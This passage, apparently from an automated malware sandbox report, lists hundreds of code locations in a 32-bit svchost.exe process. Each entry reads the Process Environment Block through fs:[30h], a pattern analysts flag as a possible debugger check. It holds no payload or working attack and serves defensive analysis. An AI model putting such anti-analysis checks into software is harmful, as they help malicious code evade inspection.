                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031666B0 mov eax, dword ptr fs:[00000030h]2_2_031666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C6A6 mov eax, dword ptr fs:[00000030h]2_2_0316C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A6C7 mov eax, dword ptr fs:[00000030h]2_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]2_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]2_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6500 mov eax, dword ptr fs:[00000030h]2_2_031C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]2_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]2_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E59C mov eax, dword ptr fs:[00000030h]2_2_0316E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132582 mov eax, dword ptr fs:[00000030h]2_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132582 mov ecx, dword ptr fs:[00000030h]2_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03164588 mov eax, dword ptr fs:[00000030h]2_2_03164588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]2_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]2_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031365D0 mov eax, dword ptr fs:[00000030h]2_2_031365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]2_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]2_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]2_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]2_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031325E0 mov eax, dword ptr fs:[00000030h]2_2_031325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C5ED mov eax, dword ptr fs:[00000030h]2_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C5ED mov eax, dword ptr fs:[00000030h]2_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]2_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]2_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]2_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A430 mov eax, dword ptr fs:[00000030h]2_2_0316A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]2_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]2_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]2_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C427 mov eax, dword ptr fs:[00000030h]2_2_0312C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EA456 mov eax, dword ptr fs:[00000030h]2_2_031EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312645D mov eax, dword ptr fs:[00000030h]2_2_0312645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315245A mov eax, dword ptr fs:[00000030h]2_2_0315245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]2_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]2_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]2_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC460 mov ecx, dword ptr fs:[00000030h]2_2_031BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EA49A mov eax, dword ptr fs:[00000030h]2_2_031EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031644B0 mov ecx, dword ptr fs:[00000030h]2_2_031644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BA4B0 mov eax, dword ptr fs:[00000030h]2_2_031BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031364AB mov eax, dword ptr fs:[00000030h]2_2_031364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031304E5 mov ecx, dword ptr fs:[00000030h]2_2_031304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204B00 mov eax, dword ptr fs:[00000030h]2_2_03204B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EB20 mov eax, dword ptr fs:[00000030h]2_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EB20 mov eax, dword ptr fs:[00000030h]2_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F8B28 mov eax, dword ptr fs:[00000030h]2_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F8B28 mov eax, dword ptr fs:[00000030h]2_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128B50 mov eax, dword ptr fs:[00000030h]2_2_03128B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DEB50 mov eax, dword ptr fs:[00000030h]2_2_031DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4B4B mov eax, dword ptr fs:[00000030h]2_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4B4B mov eax, dword ptr fs:[00000030h]2_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6B40 mov eax, dword ptr fs:[00000030h]2_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6B40 mov eax, dword ptr fs:[00000030h]2_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D8B42 mov eax, dword ptr fs:[00000030h]2_2_031D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FAB40 mov eax, dword ptr fs:[00000030h]2_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CB7E mov eax, dword ptr fs:[00000030h]2_2_0312CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]2_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]2_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]2_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03202B57 mov eax, dword ptr fs:[00000030h]2_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140BBE mov eax, dword ptr fs:[00000030h]2_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140BBE mov eax, dword ptr fs:[00000030h]2_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4BB0 mov eax, dword ptr fs:[00000030h]2_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4BB0 mov eax, dword ptr fs:[00000030h]2_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DEBD0 mov eax, dword ptr fs:[00000030h]2_2_031DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]2_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]2_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]2_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]2_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]2_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]2_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]2_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]2_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h]2_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EBFC mov eax, dword ptr fs:[00000030h]2_2_0315EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BCBF0 mov eax, dword ptr fs:[00000030h]2_2_031BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BCA11 mov eax, dword ptr fs:[00000030h]2_2_031BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03154A35 mov eax, dword ptr fs:[00000030h]2_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03154A35 mov eax, dword ptr fs:[00000030h]2_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA38 mov eax, dword ptr fs:[00000030h]2_2_0316CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA24 mov eax, dword ptr fs:[00000030h]2_2_0316CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EA2E mov eax, dword ptr fs:[00000030h]2_2_0315EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h]2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140A5B mov eax, dword ptr fs:[00000030h]2_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140A5B mov eax, dword ptr fs:[00000030h]2_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031ACA72 mov eax, dword ptr fs:[00000030h]2_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031ACA72 mov eax, dword ptr fs:[00000030h]2_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]2_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]2_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h]2_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DEA60 mov eax, dword ptr fs:[00000030h]2_2_031DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168A90 mov edx, dword ptr fs:[00000030h]2_2_03168A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h]2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204A80 mov eax, dword ptr fs:[00000030h]2_2_03204A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138AA0 mov eax, dword ptr fs:[00000030h]2_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138AA0 mov eax, dword ptr fs:[00000030h]2_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186AA4 mov eax, dword ptr fs:[00000030h]2_2_03186AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130AD0 mov eax, dword ptr fs:[00000030h]2_2_03130AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03164AD0 mov eax, dword ptr fs:[00000030h]2_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03164AD0 mov eax, dword ptr fs:[00000030h]2_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]2_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]2_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h]2_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316AAEE mov eax, dword ptr fs:[00000030h]2_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316AAEE mov eax, dword ptr fs:[00000030h]2_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC912 mov eax, dword ptr fs:[00000030h]2_2_031BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128918 mov eax, dword ptr fs:[00000030h]2_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128918 mov eax, dword ptr fs:[00000030h]2_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE908 mov eax, dword ptr fs:[00000030h]2_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE908 mov eax, dword ptr fs:[00000030h]2_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B892A mov eax, dword ptr fs:[00000030h]2_2_031B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C892B mov eax, dword ptr fs:[00000030h]2_2_031C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0946 mov eax, dword ptr fs:[00000030h]2_2_031B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204940 mov eax, dword ptr fs:[00000030h]2_2_03204940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4978 mov eax, dword ptr fs:[00000030h]2_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4978 mov eax, dword ptr fs:[00000030h]2_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC97C mov eax, dword ptr fs:[00000030h]2_2_031BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]2_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]2_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03156962 mov eax, dword ptr fs:[00000030h]2_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E mov eax, dword ptr fs:[00000030h]2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E mov edx, dword ptr fs:[00000030h]2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E mov eax, dword ptr fs:[00000030h]2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B89B3 mov esi, dword ptr fs:[00000030h]2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B89B3 mov eax, dword ptr fs:[00000030h]2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B89B3 mov eax, dword ptr fs:[00000030h]2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]2_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031309AD mov eax, dword ptr fs:[00000030h]2_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031309AD mov eax, dword ptr fs:[00000030h]2_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]2_2_0313A9D0
